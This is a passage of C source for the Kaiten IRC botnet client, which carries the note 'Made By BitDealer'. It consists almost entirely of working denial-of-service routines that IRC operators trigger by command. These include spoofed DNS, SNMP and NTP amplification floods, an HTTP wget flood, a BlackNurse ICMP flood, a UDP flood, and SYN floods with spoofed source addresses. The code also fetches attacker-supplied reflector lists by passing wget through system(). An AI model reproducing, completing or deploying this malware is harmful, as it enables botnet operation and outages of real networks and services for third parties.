while(1) {
int i,d;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) fputc(bufm[d],file);
}
fclose(file);
close(sock2);
exit(0);
}
void getspoofs(int sock, char *sender, int argc, char **argv) {
unsigned long a=spoofs,b=spoofs+(spoofsm-1);
if (spoofsm == 1) Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
else Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
}
void version(int sock, char *sender, int argc, char **argv) {
Send(sock, "NOTICE %s :Kaiten Made By BitDealer", sender);
}
void nickc(int sock, char *sender, int argc, char **argv) {
if (argc != 1) {
Send(sock, "NOTICE %s :NICK <nick>\n", sender);
return;
}
if (strlen(argv[1]) >= 10) {
Send(sock, "NOTICE %s :Nick cannot be larger than 9 characters.\n", sender);
return;
}
Send(sock, "NICK %s\n",argv[1]);
}
void disable(int sock, char *sender, int argc, char **argv) {
if (argc != 1) {
Send(sock, "NOTICE %s :DISABLE <pass>\n", sender);
Send(sock, "NOTICE %s :Current status is: %s\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
return;
}
if (disabled) {
Send(sock, "NOTICE %s :Already disabled.\n", sender);
return;
}
if (strlen(argv[1]) > 254) {
Send(sock, "NOTICE %s :Password too long! > 254\n", sender);
return;
}
disabled=1;
memset(dispass,0,256);
strcpy(dispass,argv[1]);
Send(sock, "NOTICE %s :Disable sucessful.\n");
}
void enable(int sock, char *sender, int argc, char **argv) {
if (argc != 1) {
Send(sock, "NOTICE %s :ENABLE <pass>\n", sender);
Send(sock, "NOTICE %s :Current status is: %s\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
return;
}
if (!disabled) {
Send(sock, "NOTICE %s :Already enabled.\n", sender);
return;
}
if (strcasecmp(dispass,argv[1])) {
Send(sock, "NOTICE %s :Wrong password\n", sender);
return;
}
disabled=0;
Send(sock, "NOTICE %s :Password correct.\n", sender);
}
void spoof(int sock, char *sender, int argc, char **argv) {
char ip[256];
int i, num;
unsigned long uip;
struct sockaddr_in addr;
if (argc != 1) {
Send(sock, "NOTICE %s :Removed all spoofs\n", sender);
spoofs=0;
spoofsm=0;
return;
}
if (strlen(argv[1]) > 16) {
Send(sock, "NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n", sender);
return;
}
strcpy(ip,argv[1]);
if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
num=-(num-4);
for (i=0;i<num;i++) strcat(ip,".0");
inet_aton(ip, &(addr.sin_addr));
uip = addr.sin_addr.s_addr;
if (num == 0) spoofsm=1;
else spoofsm=pow(256,num);
spoofs=uip;
}
struct send_tcp {
struct iphdr ip;
struct tcphdr tcp;
char buf[20];
};
struct pseudo_header {
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
char buf[20];
};
unsigned int host2ip(char *sender,char *hostname) {
static struct in_addr i;
struct hostent *h;
if((i.s_addr = inet_addr(hostname)) == -1) {
if((h = gethostbyname(hostname)) == NULL) {
Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
exit(0);
}
bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
}
return i.s_addr;
}
static uint32_t Q[4096], c = 362436;
struct list
{
struct sockaddr_in data;
char domain[512];
int line;
struct list *next;
struct list *prev;
};
struct list *head;
struct thread_data{
int thread_id;
struct list *list_node;
struct sockaddr_in sin;
int port;
};
struct DNS_HEADER
{
unsigned short id; // identification number
unsigned char rd :1; // recursion desired
unsigned char tc :1; // truncated message
unsigned char aa :1; // authoritive answer
unsigned char opcode :4; // purpose of message
unsigned char qr :1; // query/response flag
unsigned char rcode :4; // response code
unsigned char cd :1; // checking disabled
unsigned char ad :1; // authenticated data
unsigned char z :1; // its z! reserved
unsigned char ra :1; // recursion available
unsigned short q_count; // number of question entries
unsigned short ans_count; // number of answer entries
unsigned short auth_count; // number of authority entries
unsigned short add_count; // number of resource entries
};
//Constant sized fields of query structure
struct QUESTION
{
unsigned short qtype;
unsigned short qclass;
};
//Constant sized fields of the resource record structure
struct QUERY
{
unsigned char *name;
struct QUESTION *ques;
};
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
{
int lock = 0 , i;
strcat((char*)host,".");
for(i = 0 ; i < strlen((char*)host) ; i++)
{
if(host[i]=='.')
{
*dns++ = i-lock;
for(;lock<i;lock++)
{
*dns++=host[lock];
}
lock++; //or lock=i+1;
}
}
*dns++='\0';
}
void init_rand(uint32_t x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
void setup_udp_header(struct udphdr *udph)
{
}
void *dnsflood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
fprintf(stdout, "Thread %d started\n", td->thread_id);
char strPacket[MAX_PACKET_SIZE];
int iPayloadSize = 0;
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int iPort = td->port;
int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(s < 0)
{
fprintf(stderr, "Could not open raw socket. You need to be root!\n");
exit(-1);
}
//init random
init_rand(time(NULL));
// Clear the data
memset(strPacket, 0, MAX_PACKET_SIZE);
// Make the packet
struct iphdr *iph = (struct iphdr *) &strPacket;
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + 38;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
iPayloadSize += sizeof(struct iphdr);
struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
udph->source = htons(iPort);
udph->dest = htons(53);
udph->check = 0;
iPayloadSize += sizeof(struct udphdr);
struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
dns->id = (unsigned short) htons(rand_cmwc());
dns->qr = 0; //This is a query
dns->opcode = 0; //This is a standard query
dns->aa = 0; //Not Authoritative
dns->tc = 0; //This message is not truncated
dns->rd = 1; //Recursion Desired
dns->ra = 0; //Recursion not available! hey we dont have it
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1); //we have only 1 question
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = htons(1);
iPayloadSize += sizeof(struct DNS_HEADER);
sin.sin_port = udph->source;
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
char strDomain[512];
int i;
int j = 0;
int iAdditionalSize = 0;
while(1)
{
if(j==2){
usleep(100);
j=0;
}
//set the next node
list_node = list_node->next;
//Clear the old domain and question
memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize+256);
//add the chosen domain and question
iAdditionalSize = 0;
unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];
strcpy(strDomain, list_node->domain);
ChangetoDnsNameFormat(qname, strDomain);
//printf("!!%s %d\n", list_node->domain, list_node->line);
iAdditionalSize += strlen(qname) + 1;
struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
qinfo->qclass = htons(1);
iAdditionalSize += sizeof(struct QUESTION);
strPacket[iPayloadSize + iAdditionalSize] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 1] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 2] = 0x29;
strPacket[iPayloadSize + iAdditionalSize + 3] = 0x23;
strPacket[iPayloadSize + iAdditionalSize + 4] = 0x28;
strPacket[iPayloadSize + iAdditionalSize + 5] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 6] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 7] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 8] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 9] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 10] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 11] = 0x00;
iAdditionalSize += 11;
//set new node data
iph->daddr = list_node->data.sin_addr.s_addr;
udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr));
iph->tot_len = iPayloadSize + iAdditionalSize;
udph->source = htons(rand_cmwc() & 0xFFFF);
iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
//send
for(i = 0; i < PACKETS_PER_RESOLVER; i++)
{
sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
}
j++;
}
}
void ParseResolverLine(char *strLine, int iLine)
{
char caIP[32] = "";
char caDNS[512] = "";
int i;
char buffer[512] = "";
int moved = 0;
for(i = 0; i < strlen(strLine); i++)
{
if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')
{
moved++;
continue;
}
if(moved == 0)
{
caIP[strlen(caIP)] = (char) strLine[i];
}
else if(moved == 1)
{
caDNS[strlen(caDNS)] = (char) strLine[i];
}
}
//printf("Found resolver %s, domain %s!\n", caIP, caDNS);
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(caIP);
head->data.sin_port=htons(53);
strcpy(head->domain, caDNS);
head->line = iLine;
head->next = head;
head->prev = head;
}
else
{
struct list *new_node = (struct list *)malloc(sizeof(struct list));
memset(new_node, 0x00, sizeof(struct list));
new_node->data.sin_addr.s_addr=inet_addr(caIP);
new_node->data.sin_port=htons(53);
strcpy(new_node->domain, caDNS);
new_node->prev = head;
head->line = iLine;
new_node->next = head->next;
head->next = new_node;
}
}
void dns(int sockfd, char *sender, int argc, char **argv)
{
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if(argc < 5)
{
Send(sock, "NOTICE %s :DNS <IP> <port> <reflection file url> <threads> <time>\n", sender);
exit(-1);
}
char *command[128];
sprintf(command, "wget \"%s\" -q -O DNS.txt || busybox wget \"%s\" -O DNS.txt || /bin/busybox wget \"%s\" -O DNS.txt || /usr/busybox wget \"%s\" -O DNS.txt", argv[3], argv[3],argv[3], argv[3]);
system(command);
head = NULL;
char *strLine = (char *) malloc(256);
strLine = memset(strLine, 0x00, 256);
char strIP[32] = "";
char strDomain[256] = "";
int iLine = 0; // 0 = ip, 1 = domain.
FILE *list_fd = fopen("DNS.txt", "r");
while(fgets(strLine, 256, list_fd) != NULL)
{
ParseResolverLine(strLine, iLine);
iLine++;
}
int i = 0;
int num_threads = atoi(argv[4]);
struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];
int iPort = atoi(argv[2]);
printf("Target: %s:%d\n", argv[1], iPort);
for(i = 0; i < num_threads; i++)
{
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
td[i].port = iPort;
pthread_create( &thread[i], NULL, &dnsflood, (void *) &td[i]);
}
Send(sock, "NOTICE %s :DNS amp attacking %s:%s\n", sender,argv[1],argv[2]);
fprintf(stdout, "Starting Flood... Nigga!!\n");
if(argc > 4)
{
sleep(atoi(argv[5]));
}
exit(1);
}
/* NEW AND IMPROVED SNMPv2 AMPLIFICATION DDOS SKRIPT. */
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void setup_snmp_header(struct udphdr *udph)
{
udph->source = htons(5678);
udph->dest = htons(161);
udph->check = 0;
memcpy((void *)udph + sizeof(struct udphdr), "\x45\x00\x00\x43\x00\x00\x40\x00\x40\x11\xe0\xce\xa8\xeb\x46\x40\x29\xb5\x40\xfb\xce\x19\x00\xa1\x00\x2f\x0a\x13\x30\x25\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x18\x02\x04\x30\x54\xbc\x3f\x02\x01\x00\x02\x02\x08\xca\x30\x09\x30\x07\x06\x03\x2b\x06\x01\x05\x00", 67);
udph->len=htons(sizeof(struct udphdr) + 67);
}
void *snmpflood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
init_rand(time(NULL));
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_snmp_header(udph);
udph->source = htons(rand() % 65535 - 1026);
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
list_node = list_node->next;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
void snmp(int sock, char *sender, int argc, char**argv) {
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if(argc < 6){
Send(sock, "NOTICE %s :SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);
exit(-1);
}
char *command[128];
sprintf(command, "wget \"%s\" -q -O SNMP.txt || busybox wget \"%s\" -O SNMP.txt || /bin/busybox wget \"%s\" -O SNMP.txt || /usr/busybox wget \"%s\" -O SNMP.txt", argv[3], argv[3],argv[3], argv[3]);
system(command);
srand(time(NULL));
int i = 0;
head = NULL;
fprintf(stdout, "Setting up sockets...\n");
int max_len = 128;
char *buffer = (char *) malloc(max_len);
buffer = memset(buffer, 0x00, max_len);
int num_threads = atoi(argv[4]);
int maxpps = atoi(argv[5]);
limiter = 0;
pps = 0;
int multiplier = 20;
FILE *list_fd = fopen("SNMP.txt", "r");
while (fgets(buffer, max_len, list_fd) != NULL) {
if ((buffer[strlen(buffer) - 1] == '\n') ||
(buffer[strlen(buffer) - 1] == '\r')) {
buffer[strlen(buffer) - 1] = 0x00;
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(buffer);
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
memset(new_node, 0x00, sizeof(struct list));
new_node->data.sin_addr.s_addr=inet_addr(buffer);
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
i++;
} else {
continue;
}
}
struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
pthread_create( &thread[i], NULL, &snmpflood, (void *) &td[i]);
}
Send(sock, "NOTICE %s :SNMP amp attacking %s:%s\n", sender,argv[1],argv[2]);
fprintf(stdout, "Started SNMP DrDoS flood!\n");
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}
void wgetHTTP(int sock, char *sender, int argc, char **argv) {
unsigned char *url;
int end_time;
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock, "NOTICE %s :WGETFLOOD <url> <secs>\n", sender);
exit(1);
}
url = argv[1];
end_time = atoi(argv[2]);
int end = time(NULL) + end_time;
char *UA = UserAgents[(rand() % 36)];
char *command[512];
Send(sock, "NOTICE %s :HTTP Flooding %s\n", sender, url);
while(end > time(NULL))
{
UA = UserAgents[(rand() % 36)];
sprintf(command, "wget -U \"%s\" -q \"%s\" -O /dev/null || busybox wget -U \"%s\" -q \"%s\" -O /dev/null || /bin/busybox wget -U \"%s\" -q \"%s\" -O /dev/null || /usr/busybox wget -U \"%s\" -q \"%s\" -O /dev/null &", UA, url, UA, url, UA, url, UA, url);
system(command);
}
exit(1);
}
void *ntpflood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
init_rand(time(NULL));
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
udph->source = htons((rand() % (65535 - 1026)) + 1026);
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
list_node = list_node->next;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
void ntp(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if (argc < 6) {
Send(sock, "NOTICE %s :NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);
exit(1);
}
char *command[128];
sprintf(command, "wget \"%s\" -q -O NTP.txt || busybox wget \"%s\" -O NTP.txt || /bin/busybox wget \"%s\" -O NTP.txt || /usr/busybox wget \"%s\" -O NTP.txt", argv[3], argv[3],argv[3], argv[3]);
system(command);
srand(time(NULL));
int i = 0;
head = NULL;
fprintf(stdout, "Setting up sockets...\n");
int max_len = 128;
char *buffer = (char *) malloc(max_len);
buffer = memset(buffer, 0x00, max_len);
int num_threads = atoi(argv[4]);
int maxpps = atoi(argv[5]);
limiter = 0;
pps = 0;
int multiplier = 20;
FILE *list_fd = fopen("NTP.txt", "r");
while (fgets(buffer, max_len, list_fd) != NULL) {
if ((buffer[strlen(buffer) - 1] == '\n') ||
(buffer[strlen(buffer) - 1] == '\r')) {
buffer[strlen(buffer) - 1] = 0x00;
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(buffer);
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
memset(new_node, 0x00, sizeof(struct list));
new_node->data.sin_addr.s_addr=inet_addr(buffer);
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
i++;
} else {
continue;
}
}
struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
pthread_create( &thread[i], NULL, &ntpflood, (void *) &td[i]);
}
Send(sock, "NOTICE %s :NTP amp attacking %s:%s\n", sender,argv[1],argv[2]);
fprintf(stdout, "Starting flood...\n");
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
exit(0);
}
void blacknurse(int sock, char *sender, int argc, char *argv[])
{
uint8_t pkt_template[] = {
0x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00,
0x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00,
0x00, 0x08, 0xef, 0xc1
};
uint8_t *pkt;
struct addrinfo *ai, hints;
const char *host;
struct pollfd pfd;
const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]);
size_t i;
int gai_err;
int kindy;
int x, secs,get;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if (argc < 2) {
Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>", sender);
exit(1);
}
host = argv[1];
secs = argv[2];
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_INET;
if ((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) {
fprintf(stderr, "Unable to use [%s]: %s\n", host,
gai_strerror(gai_err));
exit(1);
}
if ((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
perror("socket");
exit(1);
}
Send(sock, "NOTICE %s :Blacknursing %s", sender, host);
pkt = pkt_template;
pfd.fd = kindy;
pfd.events = POLLOUT;
for (;;) {
for (i = 20; i < 20 + 8 + 4; i++) {
pkt[i] = (uint8_t) rand();
}
if (sendto(kindy, pkt, pkt_len, 0,
ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) {
if (errno == ENOBUFS) {
poll(&pfd, 1, 1000);
continue;
}
perror("sendto");
break;
}
if (i >= 100) {
if (time(NULL) >= start+secs) exit(0);
x=0;
}
x++;
}
/* NOTREACHED */
close(kindy);
freeaddrinfo(ai);
return;
}
void udp(int sock, char *sender, int argc, char **argv) {
unsigned int port,i=0;
unsigned long psize,target,secs;
struct sockaddr_in s_in;
struct iphdr *ip;
struct udphdr *udp;
char buf[1500],*str;
int get;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if (argc < 3) {
Send(sock, "NOTICE %s :UDP <target> <port> <secs>\n", sender);
exit(1);
}
target = host2ip(sender,argv[1]);
port = atoi(argv[2]);
secs = atol(argv[3]);
ip=(void*)buf;
udp=(void*)(buf+sizeof(struct iphdr));
str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
Send(sock, "NOTICE %s :Packeting %s\n", sender,argv[1]);
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = 1500;
ip->frag_off = 0;
ip->protocol = 17;
ip->ttl = 64;
ip->daddr = target;
udp->len = htons(psize);
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = target;
for (;;) {
udp->source = rand();
if (port) udp->dest = htons(port);
else udp->dest = rand();
udp->check = in_cksum((u_short *)buf,1500);
ip->saddr = getspoof();
ip->id = rand();
ip->check = in_cksum((u_short *)buf,1500);
s_in.sin_port = udp->dest;
sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
if (i >= 100) {
if (time(NULL) >= start+secs) exit(0);
i=0;
}
i++;
}
}
void pan(int sock, char *sender, int argc, char **argv) {
struct send_tcp send_tcp;
struct pseudo_header pseudo_header;
struct sockaddr_in sin;
unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
unsigned int psize=20, source, dest, check;
unsigned long saddr, daddr,secs;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if (argc < 3) {
Send(sock, "NOTICE %s :PAN <target> <port> <secs>\n", sender);
exit(1);
}
{int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
daddr=host2ip(sender,argv[1]);
secs=atol(argv[3]);
Send(sock, "NOTICE %s :Panning %s\n", sender,argv[1]);
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 16;
send_tcp.ip.frag_off = 64;
send_tcp.ip.ttl = 64;
send_tcp.ip.protocol = 6;
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.doff = 10;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.rst = 0;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.window = rand_cmwc();
send_tcp.tcp.urg_ptr = 0;
dest=htons(atoi(argv[2]));
while(1) {
source=rand();
if (atoi(argv[2]) == 0) dest=rand();
saddr=getspoof();
send_tcp.ip.tot_len = htons(40+psize);
send_tcp.ip.id = rand();
send_tcp.tcp.window = rand_cmwc();
send_tcp.ip.saddr = saddr;
send_tcp.ip.daddr = daddr;
send_tcp.ip.check = 0;
send_tcp.tcp.source = source;
send_tcp.tcp.dest = dest;
send_tcp.tcp.seq = rand();
send_tcp.tcp.check = 0;
sin.sin_family = AF_INET;
sin.sin_port = dest;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
check = rand();
send_tcp.buf[9]=((char*)&check)[0];
send_tcp.buf[10]=((char*)&check)[1];
send_tcp.buf[11]=((char*)&check)[2];
send_tcp.buf[12]=((char*)&check)[3];
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20+psize);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
if (a >= 100) {
if (time(NULL) >= start+secs) exit(0);
a=0;
}
a++;
}
close(get);
exit(0);
}
unsigned int realrand(int low, int high) {
srand(time(NULL));
return((rand () % (int) (((high) + 1) - (low))) + (low));
}
void phatwonk(int sock, char *sender, int argc, char **argv) {
// Phatwonk attack coded by BitDealer
// Based off of PAN, modified to attack on 31 portz
// You can set ANY TCP flag!
// You can attack with xmas, all flags at once, usyn (urg syn), and any TCP combimation you wish!
// It's very hard to block and can down virtually every service at once
struct send_tcp send_tcp;
struct pseudo_header pseudo_header;
struct sockaddr_in sin;
unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
unsigned int psize=20, source, dest, check;
unsigned long saddr, daddr,secs;
unsigned int portz[] = { 21,22,23,25,53,80,81,88,110,113,119,135,137,139,143,443,445,1024,1025,1433,1500,1720,3128,3306,3389,5000,5900,6667,6697,8000,8080 };
int howmanyportz = NUMITEMS(portz);
time_t start=time(NULL);
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if (argc < 3) {
Send(sock, "NOTICE %s :PHATWONK <target> <flags/method> <secs>\n", sender);
exit(1);
}
{int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
daddr=host2ip(sender,argv[1]);
secs=atol(argv[3]);
Send(sock, "NOTICE %s :Phatwonking %s\n", sender,argv[1]);
// Start preparing RAW TCP socket
sin.sin_family = AF_INET;
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 16;
send_tcp.ip.frag_off = 64;
send_tcp.ip.ttl = 64;
send_tcp.ip.protocol = 6;
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.doff = 10;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.urg = 0;
